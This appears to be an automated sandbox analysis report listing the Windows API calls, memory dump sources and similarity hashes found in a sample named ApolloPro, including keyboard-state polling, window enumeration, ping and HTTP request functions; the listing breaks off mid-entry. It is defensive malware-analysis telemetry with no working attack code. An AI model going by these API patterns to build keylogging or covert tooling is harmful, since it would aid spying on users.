• Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
Similarity
• API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
• String ID:
• API String ID: 2706829360-0
• Opcode ID: 0d2bd506646846ff854bc10309435c37d8405e972936f48e097e554fa1432957
• Instruction ID: 7d7b31ab4cb4a91f4648fbb6e15de92e4d8984ad5e6cc80ed74979f3afe42656
• Opcode Fuzzy Hash: 0d2bd506646846ff854bc10309435c37d8405e972936f48e097e554fa1432957
• Instruction Fuzzy Hash: 3D414F75A04119DFDB04EFA4D848DAEBBBAFF48300F10C169E955A7261CB30EA45CFA0
APIs
• GetKeyboardState.USER32(?), ref: 00690530
• GetAsyncKeyState.USER32(000000A0), ref: 006905B1
• GetKeyState.USER32(000000A0), ref: 006905CC
• GetAsyncKeyState.USER32(000000A1), ref: 006905E6
• GetKeyState.USER32(000000A1), ref: 006905FB
• GetAsyncKeyState.USER32(00000011), ref: 00690613
• GetKeyState.USER32(00000011), ref: 00690625
• GetAsyncKeyState.USER32(00000012), ref: 0069063D
• GetKeyState.USER32(00000012), ref: 0069064F
• GetAsyncKeyState.USER32(0000005B), ref: 00690667
• GetKeyState.USER32(0000005B), ref: 00690679
Memory Dump Source
• Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
• Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
Similarity
• API ID: State$Async$Keyboard
• String ID:
• API String ID: 541375521-0
• Opcode ID: 0354344bda3786852ed35efb9cea9d67ba9197caf949e85e780101a7f6eafb52
• Instruction ID: b7f135d3ecd1d71fa0d835c83f09d46f0bb4425c29d2561df8c5f2cad5d56332
• Opcode Fuzzy Hash: 0354344bda3786852ed35efb9cea9d67ba9197caf949e85e780101a7f6eafb52
• Instruction Fuzzy Hash: 3D41EB345047C96DFF30976489047F5BEAB6B51304F48405AD9C587BC1EBA499D4CFA2
APIs
  • Part of subcall function 00634D37: __itow.LIBCMT ref: 00634D62
  • Part of subcall function 00634D37: __swprintf.LIBCMT ref: 00634DAC
• CoInitialize.OLE32 ref: 006A8AED
• CoUninitialize.OLE32 ref: 006A8AF8
• CoCreateInstance.OLE32(?,00000000,00000017,006C3BBC,?), ref: 006A8B58
• IIDFromString.OLE32(?,?), ref: 006A8BCB
• VariantInit.OLEAUT32(?), ref: 006A8C65
• VariantClear.OLEAUT32(?), ref: 006A8CC6
Memory Dump Source
• Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
• Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
Similarity
• API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
• String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
• API String ID: 834269672-1287834457
• Opcode ID: e688fbac5a4290afc38904f7eacd5e247da3b7bb1f828a5f55e2b41496ebcd51
• Instruction ID: b427f0a20f76ee78dd982c714378fa1bf35cafe5cc91f68d6f0384020ae7eb13
• Opcode Fuzzy Hash: e688fbac5a4290afc38904f7eacd5e247da3b7bb1f828a5f55e2b41496ebcd51
• Instruction Fuzzy Hash: 1561AD702097119FD710EF14C888F6AB7EAAF46714F00485DF9829B291DB70ED49CFA6
APIs
• WSAStartup.WSOCK32(00000101,?), ref: 006A5E7E
• inet_addr.WSOCK32(?,?,?), ref: 006A5EC3
• gethostbyname.WSOCK32(?), ref: 006A5ECF
• IcmpCreateFile.IPHLPAPI ref: 006A5EDD
• IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 006A5F4D
• IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 006A5F63
• IcmpCloseHandle.IPHLPAPI(00000000), ref: 006A5FD8
• WSACleanup.WSOCK32 ref: 006A5FDE
Memory Dump Source
• Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
• Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
Similarity
• API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
• String ID: Ping
• API String ID: 1028309954-2246546115
• Opcode ID: c537ce954798093ba0cfc3839f77be2db4ee7af9ffef01fa0d36c23acd3559fd
• Instruction ID: f28a873759ff4b9fc613d20254d02288afc467b09caeac5b3a25448b71e4b97a
• Opcode Fuzzy Hash: c537ce954798093ba0cfc3839f77be2db4ee7af9ffef01fa0d36c23acd3559fd
• Instruction Fuzzy Hash: 1B5169316046019FDB60EF24CC89F6AB7E6AF49710F144929F996DB2A1DB70ED01CF52
APIs
• SetErrorMode.KERNEL32(00000001), ref: 0069BB13
• GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 0069BB89
• GetLastError.KERNEL32 ref: 0069BB93
• SetErrorMode.KERNEL32(00000000,READY), ref: 0069BC00
Memory Dump Source
• Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
• Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
Similarity
• API ID: Error$Mode$DiskFreeLastSpace
• String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
• API String ID: 4194297153-14809454
• Opcode ID: 5f8e673643d67a877bd0a163df7f57c88355899f1eca4cbbdb5510f14e3804fd
• Instruction ID: a26df7e5065f2f5ee149a885474573e2f1a973efee44858666f8b3c30491f80a
• Opcode Fuzzy Hash: 5f8e673643d67a877bd0a163df7f57c88355899f1eca4cbbdb5510f14e3804fd
• Instruction Fuzzy Hash: 7F31C335A002099FCF10DF69D985EFEB7BAEF44310F14915AE405976D9DF709942CB90
APIs
• LoadIconW.USER32(00000000,00007F03), ref: 0069357C
Memory Dump Source
• Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
• Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
Similarity
• API ID: IconLoad
• String ID: ,zo0zo$,zo0zo$blank$info$question$stop$warning
• API String ID: 2457776203-3742973295
• Opcode ID: af35fe8a20076542ac65a9a82d8c85023ccbae3fa68cac70a73ea27e62c8a8d0
• Instruction ID: 6d7b5f1773b7ca321f3a8ff3a4382e51993d8264ac5482e2257b9f5b6c1d5c49
• Opcode Fuzzy Hash: af35fe8a20076542ac65a9a82d8c85023ccbae3fa68cac70a73ea27e62c8a8d0
• Instruction Fuzzy Hash: 15112771609766BEEF144B25DC82CEB77DEDF0A7B0F21002EFA00A6781E7646F4046A4
                                                                                              APIs
                                                                                                • Part of subcall function 00641A36: _memmove.LIBCMT ref: 00641A77
                                                                                                • Part of subcall function 0068B79A: GetClassNameW.USER32(?,?,000000FF), ref: 0068B7BD
                                                                                              • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00689BCC
                                                                                              • GetDlgCtrlID.USER32 ref: 00689BD7
                                                                                              • GetParent.USER32 ref: 00689BF3
                                                                                              • SendMessageW.USER32(00000000,?,00000111,?), ref: 00689BF6
                                                                                              • GetDlgCtrlID.USER32(?), ref: 00689BFF
                                                                                              • GetParent.USER32(?), ref: 00689C1B
                                                                                              • SendMessageW.USER32(00000000,?,?,00000111), ref: 00689C1E
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                               • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmp
                                                                                               • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmp
                                                                                               • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmp
                                                                                               • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmp
                                                                                               • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                                                              • String ID: ComboBox$ListBox
                                                                                              • API String ID: 1536045017-1403004172
                                                                                              • Opcode ID: 1799c2c36c50042bb551928b1814c3ba17a1abf34a28e7908649b8d9502c9d12
                                                                                              • Instruction ID: 53d99a557cfc9665ca3b643df83b6e248b05b7a390f3ea0bfb8ca38d6f0b989e
                                                                                              • Opcode Fuzzy Hash: 1799c2c36c50042bb551928b1814c3ba17a1abf34a28e7908649b8d9502c9d12
                                                                                              • Instruction Fuzzy Hash: 1321C170900208ABDF04AFA1CC85EFEBBB6EF9A310F14021AF961972D1DB7958559B20
                                                                                              APIs
                                                                                                • Part of subcall function 00641A36: _memmove.LIBCMT ref: 00641A77
                                                                                                • Part of subcall function 0068B79A: GetClassNameW.USER32(?,?,000000FF), ref: 0068B7BD
                                                                                              • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 00689CB5
                                                                                              • GetDlgCtrlID.USER32 ref: 00689CC0
                                                                                              • GetParent.USER32 ref: 00689CDC
                                                                                              • SendMessageW.USER32(00000000,?,00000111,?), ref: 00689CDF
                                                                                              • GetDlgCtrlID.USER32(?), ref: 00689CE8
                                                                                              • GetParent.USER32(?), ref: 00689D04
                                                                                              • SendMessageW.USER32(00000000,?,?,00000111), ref: 00689D07
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                               • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmp
                                                                                               • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmp
                                                                                               • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmp
                                                                                               • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmp
                                                                                               • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                                                              • String ID: ComboBox$ListBox
                                                                                              • API String ID: 1536045017-1403004172
                                                                                              • Opcode ID: 11db5f32b9b348e1b886fc420503e59a1f4999be728f48ad0d9acdc5fc8e3c8f
                                                                                              • Instruction ID: d431bd5433d48f5517325690e880ab6f81082384efcc6f0d833d23b16afd1d72
                                                                                              • Opcode Fuzzy Hash: 11db5f32b9b348e1b886fc420503e59a1f4999be728f48ad0d9acdc5fc8e3c8f
                                                                                              • Instruction Fuzzy Hash: 6521D371E00208BFDF00AFA1CC85EFEBBBAEF96300F140216F95197291DB7999559B24
                                                                                              APIs
                                                                                              • GetParent.USER32 ref: 00689D27
                                                                                              • GetClassNameW.USER32(00000000,?,00000100), ref: 00689D3C
                                                                                              • _wcscmp.LIBCMT ref: 00689D4E
                                                                                              • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00689DC9
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                               • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmp
                                                                                               • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmp
                                                                                               • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmp
                                                                                               • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmp
                                                                                               • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: ClassMessageNameParentSend_wcscmp
                                                                                              • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                                              • API String ID: 1704125052-3381328864
                                                                                              • Opcode ID: 2d1898285ad632405b439b668eb5ec377e1859fe61d65cc8ac123c872138656c
                                                                                              • Instruction ID: 0cf2404c231b17e4ad5fe7e853e79e4b66690df0938cd6fe7e98862f160379e6
                                                                                              • Opcode Fuzzy Hash: 2d1898285ad632405b439b668eb5ec377e1859fe61d65cc8ac123c872138656c
                                                                                              • Instruction Fuzzy Hash: E4113676248B12BAF6103722EC06DF6739FCF067A1F200216FE00A42D1FA616A115B7C
                                                                                              APIs
                                                                                              • VariantInit.OLEAUT32(?), ref: 006A8FC1
                                                                                              • CoInitialize.OLE32(00000000), ref: 006A8FEE
                                                                                              • CoUninitialize.OLE32 ref: 006A8FF8
                                                                                              • GetRunningObjectTable.OLE32(00000000,?), ref: 006A90F8
                                                                                              • SetErrorMode.KERNEL32(00000001,00000029), ref: 006A9225
                                                                                              • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,006C3BDC), ref: 006A9259
                                                                                              • CoGetObject.OLE32(?,00000000,006C3BDC,?), ref: 006A927C
                                                                                              • SetErrorMode.KERNEL32(00000000), ref: 006A928F
                                                                                              • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 006A930F
                                                                                              • VariantClear.OLEAUT32(?), ref: 006A931F
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                               • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmp
                                                                                               • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmp
                                                                                               • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmp
                                                                                               • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmp
                                                                                               • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                                                              • String ID:
                                                                                              • API String ID: 2395222682-0
                                                                                              • Opcode ID: 1b7a95cf1e7ff1ff780773966b95634272ac576babcf4fd233ead532bcd232d0
                                                                                              • Instruction ID: cdae1fee4afc49f2548c4da49f78fdc7c9e1359da0245a8ba3afc25e01bad756
                                                                                              • Opcode Fuzzy Hash: 1b7a95cf1e7ff1ff780773966b95634272ac576babcf4fd233ead532bcd232d0
                                                                                              • Instruction Fuzzy Hash: 96C12771204305AFD740EF64C884A6BB7EAFF8A348F10491DF58A9B251DB71ED05CBA2
                                                                                              APIs
                                                                                              • GetCurrentThreadId.KERNEL32 ref: 006919EF
                                                                                              • GetForegroundWindow.USER32(00000000,?,?,?,?,?,00690A67,?,00000001), ref: 00691A03
                                                                                              • GetWindowThreadProcessId.USER32(00000000), ref: 00691A0A
                                                                                              • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00690A67,?,00000001), ref: 00691A19
                                                                                              • GetWindowThreadProcessId.USER32(?,00000000), ref: 00691A2B
                                                                                              • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00690A67,?,00000001), ref: 00691A44
                                                                                              • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00690A67,?,00000001), ref: 00691A56
                                                                                              • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00690A67,?,00000001), ref: 00691A9B
                                                                                              • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00690A67,?,00000001), ref: 00691AB0
                                                                                              • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00690A67,?,00000001), ref: 00691ABB
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                               • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmp
                                                                                               • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmp
                                                                                               • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmp
                                                                                               • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmp
                                                                                               • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                                              • String ID:
                                                                                              • API String ID: 2156557900-0
                                                                                              • Opcode ID: 681a3eb710cc39bb7eaac9660d36866abaebc7bc8b50a315c01b0b5c822e67c3
                                                                                              • Instruction ID: a7b67cd0d5e3d369b6170d36baa11db17febd9fc1751965c198e29a6b18a6b22
                                                                                              • Opcode Fuzzy Hash: 681a3eb710cc39bb7eaac9660d36866abaebc7bc8b50a315c01b0b5c822e67c3
                                                                                              • Instruction Fuzzy Hash: E431BB71652209AFEF209F54DC48FBA77AFAB66355F206159F800CB690DBB49D80CB60
                                                                                              APIs
                                                                                              • GetSysColor.USER32(00000008), ref: 0063260D
                                                                                              • SetTextColor.GDI32(?,000000FF), ref: 00632617
                                                                                              • SetBkMode.GDI32(?,00000001), ref: 0063262C
                                                                                              • GetStockObject.GDI32(00000005), ref: 00632634
                                                                                              • GetClientRect.USER32(?), ref: 0066C0FC
                                                                                              • SendMessageW.USER32(?,00001328,00000000,?), ref: 0066C113
                                                                                              • GetWindowDC.USER32(?), ref: 0066C11F
                                                                                              • GetPixel.GDI32(00000000,?,?), ref: 0066C12E
                                                                                              • ReleaseDC.USER32(?,00000000), ref: 0066C140
                                                                                              • GetSysColor.USER32(00000005), ref: 0066C15E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                               • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmp
                                                                                               • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmp
                                                                                               • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmp
                                                                                               • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmp
                                                                                               • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: Color$ClientMessageModeObjectPixelRectReleaseSendStockTextWindow
                                                                                              • String ID:
                                                                                              • API String ID: 3430376129-0
                                                                                              • Opcode ID: 9f5513f66129c106554bfac1ece45a1c5f0c2377573cfae0f97cddb6120c50bf
                                                                                              • Instruction ID: 0ca202565344b95a44c79009150996d5a348c6edb2c9a0aeefa1e835050c490d
                                                                                              • Opcode Fuzzy Hash: 9f5513f66129c106554bfac1ece45a1c5f0c2377573cfae0f97cddb6120c50bf
                                                                                              • Instruction Fuzzy Hash: 9A114431500605FFEB615FA4EC48FF9BBA3EB09321F544221FA66951A1CB310A51EB50
                                                                                              APIs
                                                                                              • EnumChildWindows.USER32(?,0068B13A), ref: 0068B078
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                               • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmp
                                                                                               • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmp
                                                                                               • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmp
                                                                                               • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmp
                                                                                               • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: ChildEnumWindows
                                                                                              • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                                              • API String ID: 3555792229-1603158881
                                                                                              • Opcode ID: b2585ed6cddc3333c0e546b595163ae7a01f61b575e6691a8b02c36b1aa836a4
                                                                                              • Instruction ID: b9111514b29c5c4894e25b57f9a0c0f90ab8a1c1247152b6104d7b9edccaeb37
                                                                                              • Opcode Fuzzy Hash: b2585ed6cddc3333c0e546b595163ae7a01f61b575e6691a8b02c36b1aa836a4
                                                                                              • Instruction Fuzzy Hash: B5919370900605DBEB58EFA0C481BEEFB77BF05300F10821AED5AA7251DF306999DB95
                                                                                              APIs
                                                                                              • SetWindowLongW.USER32(?,000000EB), ref: 0063327E
                                                                                                • Part of subcall function 0063218F: GetClientRect.USER32(?,?), ref: 006321B8
                                                                                                • Part of subcall function 0063218F: GetWindowRect.USER32(?,?), ref: 006321F9
                                                                                                • Part of subcall function 0063218F: ScreenToClient.USER32(?,?), ref: 00632221
                                                                                              • GetDC.USER32 ref: 0066D073
                                                                                              • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 0066D086
                                                                                              • SelectObject.GDI32(00000000,00000000), ref: 0066D094
                                                                                              • SelectObject.GDI32(00000000,00000000), ref: 0066D0A9
                                                                                              • ReleaseDC.USER32(?,00000000), ref: 0066D0B1
                                                                                              • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 0066D13C
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                               • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmp
                                                                                               • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmp
                                                                                               • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmp
                                                                                               • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmp
                                                                                               • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                                                              • String ID: U
                                                                                              • API String ID: 4009187628-3372436214
                                                                                              • Opcode ID: 9f4965ba692463bf9e95fa34679f26c463c2bd421b292b8e6049bf3090856151
                                                                                              • Instruction ID: aff7c3f4d2c762a01e80306cad2c2f2cefc9f477092a267701fd598c4b33684c
                                                                                              • Opcode Fuzzy Hash: 9f4965ba692463bf9e95fa34679f26c463c2bd421b292b8e6049bf3090856151
                                                                                              • Instruction Fuzzy Hash: 4171B130A04205EFCF218F64C884AFA7BB7FF4A364F144269ED559A365C7319D92DBA0
                                                                                              APIs
                                                                                                • Part of subcall function 006329E2: GetWindowLongW.USER32(?,000000EB), ref: 006329F3
                                                                                                • Part of subcall function 00632714: GetCursorPos.USER32(?), ref: 00632727
                                                                                                • Part of subcall function 00632714: ScreenToClient.USER32(006F77B0,?), ref: 00632744
                                                                                                • Part of subcall function 00632714: GetAsyncKeyState.USER32(00000001), ref: 00632769
                                                                                                • Part of subcall function 00632714: GetAsyncKeyState.USER32(00000002), ref: 00632777
                                                                                              • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?), ref: 006BC69C
                                                                                              • ImageList_EndDrag.COMCTL32 ref: 006BC6A2
                                                                                              • ReleaseCapture.USER32 ref: 006BC6A8
                                                                                              • SetWindowTextW.USER32(?,00000000), ref: 006BC752
                                                                                              • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 006BC765
                                                                                              • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?), ref: 006BC847
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                                                                                              • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                                                                              • API String ID: 1924731296-2107944366
                                                                                              • Opcode ID: fde6c3a0762d222e0707f0050213aeac3eed8c1cf1dffbccd5831ddfd90dabbc
                                                                                              • Instruction ID: b9164ba222faf9f941be66faa87ebcc3eabfe9ad666459b267b6a891147b08b2
                                                                                              • Opcode Fuzzy Hash: fde6c3a0762d222e0707f0050213aeac3eed8c1cf1dffbccd5831ddfd90dabbc
                                                                                              • Instruction Fuzzy Hash: A0517C70604305AFD700EF14CC59FBA7BE6EB84310F10452DF9958B2E1DB70AA85CB96
                                                                                              APIs
                                                                                              • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 006A211C
                                                                                              • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 006A2148
